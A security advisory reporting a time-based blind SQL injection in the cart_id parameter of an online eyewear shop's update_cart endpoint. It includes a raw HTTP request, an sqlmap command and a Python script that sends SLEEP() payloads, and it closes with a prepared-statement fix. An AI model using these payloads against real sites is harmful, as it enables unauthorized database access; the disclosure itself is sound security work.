Submission #84928: SourceCodester Online Eyewear Shop 1.0 SQL Injection

Information

Title: SourceCodester Online Eyewear Shop 1.0 SQL Injection
Description: The application Online Eyewear Shop 1.0 is vulnerable to time-based blind SQL injection. The vulnerability is triggered by sending a specially crafted POST request, authenticated as a customer user, to the following URL:

- http://localhost/oews/classes/Master.php?f=update_cart

The vulnerable function is "update_cart" in the following source file:

- oews/classes/Master.php

The vulnerable parameter is "cart_id", sent in the body of the following POST request:

'''
POST /oews/classes/Master.php?f=update_cart HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 29
Origin: http://localhost
Connection: close
Referer: http://localhost/oews/?p=cart_list
Cookie: PHPSESSID=<customer-session-cookie>
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

cart_id=*&qty=7
'''

The above request, saved to a file, can be used directly with sqlmap (the "*" marks the injection point; "-b" retrieves the DBMS banner):

$ sqlmap -r req.txt -b --dbms "MySQL"
User: pcontiCP (UID 40374)
Submission: 06/02/2023 16:31 (3 years ago)
Moderation: 06/02/2023 19:50 (3 hours later)
Status: Accepted
VulDB entry: 220245 [SourceCodester Online Eyewear Shop 1.0 HTTP POST Request Master.php?f=update_cart cart_id SQL injection]
Points: 17
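Before handing the request to sqlmap, a practitioner usually confirms a time-based injection by hand: send the advisory's update_cart request once as-is and once with a SLEEP() payload in cart_id, and check that the second response is consistently slower. The script below is an added example written for this page; it is not code from the submitter or from the SourceCodester project. The URL, form fields and session-cookie placeholder are taken from the advisory; everything else is assumed, in particular that cart_id is interpolated unquoted into a numeric WHERE clause (the advisory does not state the injection context), and the timing thresholds.

```python
"""
Manual check for the time-based blind SQL injection in update_cart.
Sends the baseline request from the advisory, then the same request with a
SLEEP() payload in cart_id, and compares response times.
"""
import time
import urllib.parse
import urllib.request

# Target URL and cookie placeholder exactly as given in the advisory.
TARGET = "http://localhost/oews/classes/Master.php?f=update_cart"
SESSION_COOKIE = "PHPSESSID=<customer-session-cookie>"


def build_body(cart_id: str, qty: int = 7) -> bytes:
    """URL-encode the update_cart form body (cart_id and qty, as in the advisory)."""
    return urllib.parse.urlencode({"cart_id": cart_id, "qty": qty}).encode()


def sleep_payload(base_id: str, seconds: int) -> str:
    """Payload for the cart_id field.

    Assumption (not stated in the advisory): cart_id is concatenated unquoted
    into a numeric WHERE clause, so a bare AND SLEEP(n) delays the query.
    If the value turns out to be quoted, a string-context payload such as
    "1' AND SLEEP(n) AND '1'='1" is needed instead.
    """
    return f"{base_id} AND SLEEP({seconds})"


def timed_request(body: bytes, url: str = TARGET, cookie: str = SESSION_COOKIE,
                  timeout: float = 30.0) -> float:
    """POST body to url with the customer session cookie; return elapsed seconds.

    Error responses and timeouts are timed as well: the delay happens
    server-side regardless of what the endpoint returns afterwards.
    """
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Cookie": cookie,
        },
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except OSError:  # URLError, HTTPError and socket timeouts are all OSError
        pass
    return time.monotonic() - start


def confirm_time_based(send, base_id: str = "1", delay: int = 5,
                       rounds: int = 3) -> bool:
    """Return True if the SLEEP payload consistently delays the response.

    send: callable taking the encoded body and returning elapsed seconds
    (timed_request in practice; a stub in tests). The baseline is the slowest
    of `rounds` normal requests, so ordinary jitter is not mistaken for
    injection; every injected request must then exceed the baseline by at
    least 80% of the requested delay.
    """
    baseline = max(send(build_body(base_id)) for _ in range(rounds))
    for _ in range(rounds):
        elapsed = send(build_body(sleep_payload(base_id, delay)))
        if elapsed < baseline + 0.8 * delay:
            return False
    return True


if __name__ == "__main__":
    # Only run this against your own local instance of the application.
    print("time-based injection confirmed:", confirm_time_based(timed_request))
```

Replace the cookie placeholder with a real customer PHPSESSID before running. A consistent delay on every injected round, with no delay on the baseline, is the same evidence sqlmap relies on for its time-based technique; the usual fix on the application side is to cast cart_id to an integer or bind it through a prepared statement instead of concatenating it into the query.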
